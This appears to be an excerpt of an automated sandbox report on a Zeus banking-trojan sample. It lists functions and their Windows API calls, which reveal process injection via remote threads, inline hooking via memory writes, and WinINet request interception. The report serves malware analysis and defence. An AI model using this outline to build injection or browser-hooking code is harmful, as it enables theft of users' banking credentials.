Part of subcall function 003BDD09: TlsAlloc.KERNEL32(003D2868,00000000,0000018C,00000000,00000000), ref: 003BDD22
Part of subcall function 003BDD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 003BDD4A
Part of subcall function 003BDD09: CreateEventW.KERNEL32(003D2C30,00000001,00000000,?,84889912,?,00000001), ref: 003BDD74
Part of subcall function 003BDD09: CreateMutexW.KERNEL32(003D2C30,00000000,?,18782822,?,00000001), ref: 003BDD97
Part of subcall function 003BDD09: CreateFileMappingW.KERNEL32(00000000,003D2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 003BDDC2
Part of subcall function 003BDD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 003BDDD8
Part of subcall function 003BDD09: GetDC.USER32(00000000), ref: 003BDDF5
Part of subcall function 003BDD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 003BDE15
Part of subcall function 003BDD09: GetDeviceCaps.GDI32(?,0000000A), ref: 003BDE1F
Part of subcall function 003BDD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 003BDE32
Part of subcall function 003BDD09: ReleaseDC.USER32(00000000,?), ref: 003BDE56
Part of subcall function 003BDD09: CreateMutexW.KERNEL32(003D2C30,00000000,?,1898B122,?,00000001,003D28B8,?,00000102,003D28A4,003D2E70,00000010,?,?), ref: 003BDF00
Part of subcall function 003BDD09: GetDC.USER32(00000000), ref: 003BDF15
Part of subcall function 003BDD09: CreateCompatibleDC.GDI32(00000000), ref: 003BDF23
Part of subcall function 003BDD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 003BDF3A
Part of subcall function 003BDD09: SelectObject.GDI32(00000000,00000000), ref: 003BDF4D
Part of subcall function 003BDD09: ReleaseDC.USER32(00000000,00000001), ref: 003BDF65

GetShellWindow.USER32 ref: 003B7338
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 003B736B

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

WaitForSingleObject.KERNEL32(00000000,00001388), ref: 003B73CD
CloseHandle.KERNEL32(?), ref: 003B73DD
CloseHandle.KERNEL32(?), ref: 003B73E3
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 003B73F2

Part of subcall function 003BD4B4: WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,003BE1F1,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 003BD714
Part of subcall function 003BD4B4: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003BD72F
Part of subcall function 003BD4B4: ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 003BD7C1
Part of subcall function 003BD4B4: GetSystemMetrics.USER32(00000017), ref: 003BD8DB
Part of subcall function 003BD4B4: ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 003BDC67

Part of subcall function 003BDF74: DeleteObject.GDI32(00000000), ref: 003BDF87
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BDF97
Part of subcall function 003BDF74: TlsFree.KERNEL32(00000000,00000000,003D2868,00000000,003BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 003BDFA2
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BDFB0
Part of subcall function 003BDF74: UnmapViewOfFile.KERNEL32(00000000,00000000,003D2868,00000000,003BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 003BDFBA
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BDFC7
Part of subcall function 003BDF74: SelectObject.GDI32(00000000,00000000), ref: 003BDFE1
Part of subcall function 003BDF74: DeleteObject.GDI32(00000000), ref: 003BDFF2
Part of subcall function 003BDF74: DeleteDC.GDI32(00000000), ref: 003BDFFF
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BE010
Part of subcall function 003BDF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003BE01F
Part of subcall function 003BDF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 003BE038

Part of subcall function 003C65B7: recv.WS2_32(?,?,00000400,00000000), ref: 003C6600
Part of subcall function 003C65B7: #19.WS2_32(?,?,00000000,00000000), ref: 003C661A
Part of subcall function 003C65B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 003C6657

Part of subcall function 003C675E: shutdown.WS2_32(?,00000002), ref: 003C6766
Part of subcall function 003C675E: #3.WS2_32(?), ref: 003C676D

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 003C67CC

Part of subcall function 003C6774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 003C67A7

Part of subcall function 003C6403: socket.WS2_32(?,00000001,00000006), ref: 003C640C
Part of subcall function 003C6403: connect.WS2_32(00000000,?,-0000001D), ref: 003C642C
Part of subcall function 003C6403: #3.WS2_32(00000000), ref: 003C6437

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CA6AF, Relevance: 12.2, APIs: 8, Instructions: 165

APIs

Part of subcall function 003CA594: HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 003CA5F4

Part of subcall function 003C1049: EnterCriticalSection.KERNEL32(003D2AC8), ref: 003C1064
Part of subcall function 003C1049: LeaveCriticalSection.KERNEL32(003D2AC8), ref: 003C10E7
Part of subcall function 003C1049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 003C11B2
Part of subcall function 003C1049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 003C13EC

SetLastError.KERNEL32(00002F78), ref: 003CA6F6
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 003CA762
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 003CA77E
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 003CA795
EnterCriticalSection.KERNEL32(003D3F24), ref: 003CA79D
LeaveCriticalSection.KERNEL32(003D3F24,?), ref: 003CA853

Part of subcall function 003C5048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 003C506A
Part of subcall function 003C5048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 003C508C
Part of subcall function 003C5048: InternetCloseHandle.WININET(?), ref: 003C5094

Part of subcall function 003C1C3C: CreateThread.KERNEL32(00000000,00000000,Function_00011A04,?,00000000,00000000), ref: 003C1C81
Part of subcall function 003C1C3C: CloseHandle.KERNEL32(?), ref: 003C1C9A

EnterCriticalSection.KERNEL32(003D3F24), ref: 003CA87A
LeaveCriticalSection.KERNEL32(003D3F24,?), ref: 003CA8BA

Part of subcall function 003C9C3C: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,003D3F24,003CA893,?), ref: 003C9CB1

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004131CC, Relevance: 12.1, APIs: 8, Instructions: 114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004131ED
Process32FirstW.KERNEL32(000001E6,?), ref: 00413216

Part of subcall function 0041245B: CreateMutexW.KERNEL32(00422C30,00000001,?,00422E70,76C605D7,?,00000002,?,76C605D7), ref: 004124A3
Part of subcall function 0041245B: GetLastError.KERNEL32 ref: 004124AF
Part of subcall function 0041245B: CloseHandle.KERNEL32(00000000), ref: 004124BD

OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00413271
CloseHandle.KERNEL32(?), ref: 0041330E

Part of subcall function 004149D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 004149E2
Part of subcall function 004149D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00412326,000000FF,00422C08), ref: 00414A0E
Part of subcall function 004149D2: CloseHandle.KERNEL32(?), ref: 00414A23

CloseHandle.KERNEL32(00000000), ref: 0041328E
GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 004132A1

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

Part of subcall function 00413048: OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 00413157
Part of subcall function 00413048: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00835903,00000000,00000000,00000000), ref: 00413185
Part of subcall function 00413048: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00413198
Part of subcall function 00413048: CloseHandle.KERNEL32(?), ref: 004131A1
Part of subcall function 00413048: VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 004131B5
Part of subcall function 00413048: CloseHandle.KERNEL32(00000000), ref: 004131BC

Process32NextW.KERNEL32(000001E6,0000022C), ref: 0041331A
CloseHandle.KERNEL32(000001E6), ref: 0041332B

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C31CC, Relevance: 12.1, APIs: 8, Instructions: 114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003C31ED
Process32FirstW.KERNEL32(000001E6,?), ref: 003C3216

Part of subcall function 003C245B: CreateMutexW.KERNELBASE(003D2C30,00000001,?,003D2E70,76C605D7,?,00000002,?,76C605D7), ref: 003C24A3
Part of subcall function 003C245B: GetLastError.KERNEL32 ref: 003C24AF
Part of subcall function 003C245B: CloseHandle.KERNEL32(00000000), ref: 003C24BD

OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 003C3271
CloseHandle.KERNEL32(?), ref: 003C330E

Part of subcall function 003C49D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,003C2326,000000FF,003D2C08,?,?,00000000), ref: 003C49E2
Part of subcall function 003C49D2: GetTokenInformation.ADVAPI32(?,0000000C,00000000,00000004,00000000,?,?,?,003C2326,000000FF,003D2C08), ref: 003C4A0E
Part of subcall function 003C49D2: CloseHandle.KERNEL32(?), ref: 003C4A23

CloseHandle.KERNEL32(00000000), ref: 003C328E
GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 003C32A1

Part of subcall function 003C3346: HeapAlloc.KERNEL32(00000008,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?,?), ref: 003C3368
Part of subcall function 003C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?), ref: 003C3379

Part of subcall function 003C3048: OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 003C3157
Part of subcall function 003C3048: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00795903,00000000,00000000,00000000), ref: 003C3185
Part of subcall function 003C3048: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 003C3198
Part of subcall function 003C3048: CloseHandle.KERNEL32(?), ref: 003C31A1
Part of subcall function 003C3048: VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 003C31B5
Part of subcall function 003C3048: CloseHandle.KERNEL32(00000000), ref: 003C31BC

Process32NextW.KERNEL32(000001E6,0000022C), ref: 003C331A
CloseHandle.KERNEL32(000001E6), ref: 003C332B

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040B11C, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B130
ReleaseMutex.KERNEL32(?), ref: 0040B14F
GetWindowRect.USER32(?,?), ref: 0040B15C
IsRectEmpty.USER32(?), ref: 0040B1E0
GetWindowLongW.USER32(?,000000F0), ref: 0040B1EF
GetParent.USER32(?), ref: 0040B205
MapWindowPoints.USER32(00000000,00000000), ref: 0040B20E
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040B232

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BB11C, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 003BB130
ReleaseMutex.KERNEL32(?), ref: 003BB14F
GetWindowRect.USER32(?,?), ref: 003BB15C
IsRectEmpty.USER32(?), ref: 003BB1E0
GetWindowLongW.USER32(?,000000F0), ref: 003BB1EF
GetParent.USER32(?), ref: 003BB205
MapWindowPoints.USER32(00000000,00000000), ref: 003BB20E
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 003BB232

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004114C3, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367

APIs

Part of subcall function 0041433F: CharLowerA.USER32(00000000), ref: 00414420
Part of subcall function 0041433F: CharLowerA.USER32(?), ref: 0041442D

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

Part of subcall function 00417FE1: StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005), ref: 00418104

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

InternetCrackUrlA.WININET ref: 004117AC
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 004117CA

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

LeaveCriticalSection.KERNEL32(00422AC8,?,?), ref: 0041194D

Part of subcall function 00414660: CryptAcquireContextW.ADVAPI32(00418C87,00000000,00000000,00000001,F0000040,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414679
Part of subcall function 00414660: CryptCreateHash.ADVAPI32(00418C87,00008003,00000000,00000000,00000030,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414691
Part of subcall function 00414660: CryptHashData.ADVAPI32(00000030,00000010,00418C87,00000000,?,00418C87), ref: 004146AD
Part of subcall function 00414660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00418C87), ref: 004146C5
Part of subcall function 00414660: CryptDestroyHash.ADVAPI32(00000030,?,00418C87), ref: 004146DC
Part of subcall function 00414660: CryptReleaseContext.ADVAPI32(00418C87,00000000,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 004146E6

GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 004118E4

Part of subcall function 0041763A: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00419EAB,?,?,00000004), ref: 00417658
Part of subcall function 0041763A: RegSetValueExW.ADVAPI32(00000004,00000004,00000000,?,?,00419EAB,?,?,00419EAB,?,?,00000004,?,00000004), ref: 00417672
Part of subcall function 0041763A: RegCloseKey.ADVAPI32(00000004,?,?,00419EAB,?,?,00000004,?,00000004), ref: 00417681

EnterCriticalSection.KERNEL32(00422AC8), ref: 00411910

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

?*, xrefs: 004114FD

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C14C3, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367

APIs

Part of subcall function 003C433F: CharLowerA.USER32(00000000), ref: 003C4420
Part of subcall function 003C433F: CharLowerA.USER32(?), ref: 003C442D

Part of subcall function 003C3346: HeapAlloc.KERNEL32(00000008,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?,?), ref: 003C3368
Part of subcall function 003C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?), ref: 003C3379

Part of subcall function 003C7FE1: StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005), ref: 003C8104

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

InternetCrackUrlA.WININET ref: 003C17AC
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 003C17CA

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

LeaveCriticalSection.KERNEL32(003D2AC8,?,?), ref: 003C194D

Part of subcall function 003C4660: CryptAcquireContextW.ADVAPI32(003C8C87,00000000,00000000,00000001,F0000040,?,003C8C87,?,00000030,?,?,?,003C91A0,003D3EC0), ref: 003C4679
Part of subcall function 003C4660: CryptCreateHash.ADVAPI32(003C8C87,00008003,00000000,00000000,00000030,?,003C8C87,?,00000030,?,?,?,003C91A0,003D3EC0), ref: 003C4691
Part of subcall function 003C4660: CryptHashData.ADVAPI32(00000030,00000010,003C8C87,00000000,?,003C8C87), ref: 003C46AD
Part of subcall function 003C4660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,003C8C87), ref: 003C46C5
Part of subcall function 003C4660: CryptDestroyHash.ADVAPI32(00000030,?,003C8C87), ref: 003C46DC
Part of subcall function 003C4660: CryptReleaseContext.ADVAPI32(003C8C87,00000000,?,003C8C87,?,00000030,?,?,?,003C91A0,003D3EC0), ref: 003C46E6

GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 003C18E4

Part of subcall function 003C763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,003C9EAB,?,?,00000004), ref: 003C7658
Part of subcall function 003C763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,003C9EAB,?,?,003C9EAB,?,?,00000004,?,00000004), ref: 003C7672
Part of subcall function 003C763A: RegCloseKey.ADVAPI32(00000004,?,?,003C9EAB,?,?,00000004,?,00000004), ref: 003C7681

EnterCriticalSection.KERNEL32(003D2AC8), ref: 003C1910

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Strings

?*, xrefs: 003C14FD

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004063F0, Relevance: 10.7, APIs: 7, Instructions: 216

APIs

Part of subcall function 00412507: CreateMutexW.KERNELBASE(00422C30,00000000,?,?,?,?,?), ref: 00412528

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

Part of subcall function 00405ECF: PathRemoveFileSpecW.SHLWAPI(004225D0), ref: 00405F07
Part of subcall function 00405ECF: PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 00405F23
Part of subcall function 00405ECF: GetFileAttributesW.KERNEL32(004223C8,004225D0,004225D0,00000000,00020000,004069C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 00405F46

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000330,?,?,00000102), ref: 00406538
GetFileAttributesW.KERNEL32(004223C8), ref: 0040654B
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00406571
CloseHandle.KERNEL32(00000000), ref: 0040658F
lstrcmpiW.KERNEL32(?,?), ref: 004065BF
MoveFileExW.KERNEL32(?,?,0000000B), ref: 004065E7

Part of subcall function 00406BD7: RegOpenKeyExW.ADVAPI32(80000001,004227F0,00000000,00000001,?,?), ref: 00406C00

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00406010: GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 0040610F
Part of subcall function 00406010: GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 00406162
Part of subcall function 00406010: GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 004061A4
Part of subcall function 00406010: GetUserNameExW.SECUR32(00000002,?,00000104), ref: 004061E6

Part of subcall function 0040680D: WaitForSingleObject.KERNEL32(?,00001388), ref: 0040685A
Part of subcall function 0040680D: Sleep.KERNEL32(00001388,?,?,?,00000000,?,?,-78D0C214,00000002), ref: 00406869

Part of subcall function 00419354: FlushFileBuffers.KERNEL32(00000000), ref: 00419360
Part of subcall function 00419354: CloseHandle.KERNEL32(?), ref: 00419368

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

Part of subcall function 004186EF: GetFileSizeEx.KERNEL32(0041925C,0041925C,?,?,?,0041925C,00000000), ref: 004186FB

WaitForSingleObject.KERNEL32(00007530,?), ref: 0040668B

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B63F0, Relevance: 10.7, APIs: 7, Instructions: 216

APIs

Part of subcall function 003C2507: CreateMutexW.KERNEL32(003D2C30,00000000,?,?,?,?,?), ref: 003C2528

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

Part of subcall function 003B5ECF: PathRemoveFileSpecW.SHLWAPI(003D25D0), ref: 003B5F07
Part of subcall function 003B5ECF: PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 003B5F23
Part of subcall function 003B5ECF: GetFileAttributesW.KERNEL32(003D23C8,003D25D0,003D25D0,00000000,00020000,003B69C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 003B5F46

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000330,?,?,00000102), ref: 003B6538
GetFileAttributesW.KERNEL32(003D23C8), ref: 003B654B
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 003B6571
CloseHandle.KERNEL32(00000000), ref: 003B658F
lstrcmpiW.KERNEL32(?,?), ref: 003B65BF
MoveFileExW.KERNEL32(?,?,0000000B), ref: 003B65E7

Part of subcall function 003B6BD7: RegOpenKeyExW.ADVAPI32(80000001,003D27F0,00000000,00000001,?,?), ref: 003B6C00

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003B6010: GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 003B610F
Part of subcall function 003B6010: GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 003B6162
Part of subcall function 003B6010: GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 003B61A4
Part of subcall function 003B6010: GetUserNameExW.SECUR32(00000002,?,00000104), ref: 003B61E6

Part of subcall function 003B680D: WaitForSingleObject.KERNEL32(?,00001388), ref: 003B685A
Part of subcall function 003B680D: Sleep.KERNEL32(00001388,?,?,?,00000000,?,?,-78D0C214,00000002), ref: 003B6869

Part of subcall function 003C9354: FlushFileBuffers.KERNEL32(00000000), ref: 003C9360
Part of subcall function 003C9354: CloseHandle.KERNEL32(?), ref: 003C9368

Part of subcall function 003C8716: SetFileAttributesW.KERNEL32(00000080,00000080,003CB4CD,?), ref: 003C871F
Part of subcall function 003C8716: DeleteFileW.KERNEL32(?), ref: 003C8729

Part of subcall function 003C86EF: GetFileSizeEx.KERNEL32(003C925C,003C925C,?,?,?,003C925C,00000000), ref: 003C86FB

WaitForSingleObject.KERNEL32(00007530,?), ref: 003B668B

Part of subcall function 003C6B8E: ReleaseMutex.KERNEL32(00000000,003C3021,?,?,?), ref: 003C6B92

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00417BF7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108

APIs

Part of subcall function 00417BB2: VirtualQueryEx.KERNEL32(000000FF,DB84D88A,?,0000001C,0040C168,DB84D88A,?,?,?,0040BD76,00000000,00000000,00000004,?,?,0040C160), ref: 00417BC7

VirtualProtectEx.KERNEL32(000000FF,0040C160,0000001E,00000040,`#B,0040C158,00000004,?,?,?,?,0040BE97,6A004223,00000000), ref: 00417C24
ReadProcessMemory.KERNEL32(000000FF,0040C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,0040BE97,6A004223,00000000), ref: 00417C4B
WriteProcessMemory.KERNEL32(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 00417CC5
WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000), ref: 00417CED
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,`#B,`#B,?,?,?,?,0040BE97,6A004223,00000000,?,?,0040C160,00422360), ref: 00417D05

Strings

`#B, xrefs: 00417C17, 00417CF7, 00417CFB, 00417C1A, 00417CFA

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CA298, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94

APIs

ResetEvent.KERNEL32(?), ref: 003CA2A6

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

InternetSetStatusCallbackW.WININET(?,003CA24F), ref: 003CA2DB
InternetReadFileExA.WININET ref: 003CA31B
GetLastError.KERNEL32 ref: 003CA325

Part of subcall function 003C6B28: TranslateMessage.USER32(?), ref: 003C6B4A
Part of subcall function 003C6B28: DispatchMessageW.USER32(?), ref: 003C6B55
Part of subcall function 003C6B28: PeekMessageW.USER32(00000000), ref: 003C6B65
Part of subcall function 003C6B28: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003C6B79

InternetSetStatusCallbackW.WININET(?,?), ref: 003CA389

